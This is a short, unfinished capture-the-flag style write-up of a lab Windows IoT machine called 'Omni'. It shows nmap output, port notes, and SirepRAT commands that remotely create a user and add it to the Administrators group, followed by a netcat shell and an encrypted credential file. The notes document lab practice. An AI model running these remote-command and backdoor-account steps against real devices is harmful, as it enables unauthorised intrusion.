Kzk's garden

Machine - Omni - Easy - Windows - Abandoned

2 min read

Machine - Omni - Easy - Windows - Abandoned

PORT      STATE SERVICE    REASON
135/tcp   open  msrpc      syn-ack ttl 127
5985/tcp  open  wsman      syn-ack ttl 127
8080/tcp  open  http-proxy syn-ack ttl 127
29817/tcp open  unknown    syn-ack ttl 127
29819/tcp open  unknown    syn-ack ttl 127
29820/tcp open  unknown    syn-ack ttl 127

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=10/24%Time=61757393%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x
SF:04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\
SF:xc9}\xc8O\x12");
  • 135
    • rpcdump send a lot of things
  • 5985 seems to be winrm port being open
    • But I don’t have any user/password
  • 8080
    • has a basic auth …
    • we could try to fuzz it…
      • 8080/FUZZ
      • 8080/FUZZ.asp
      • 8080/FUZZ.aspx
      • 8080/FUZZ.php
  • 29817
    • nothing on netcat
  • 29819
    • nc send a PING
  • 29820
    • nc send some weird chars

So after looking closely to the ports, it seems it’s a windows iOT and there is a exploit to execute commands https://github.com/SafeBreach-Labs/SirepRAT

since winrm is already open… I will create a new user

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net user kozko kozko /add"

and give it administration permission

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net localgroup Administrators kozko /add"

 evil-winrm -i 10.10.10.204 -u kozko

didn’t work :(

in the port 8080, now that we have a user, we can login :)

with nc64.exe we got a shell

and in thew folder c:\Data\Users\app there is a file user.txt with the following content

type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

Graph View

Backlinks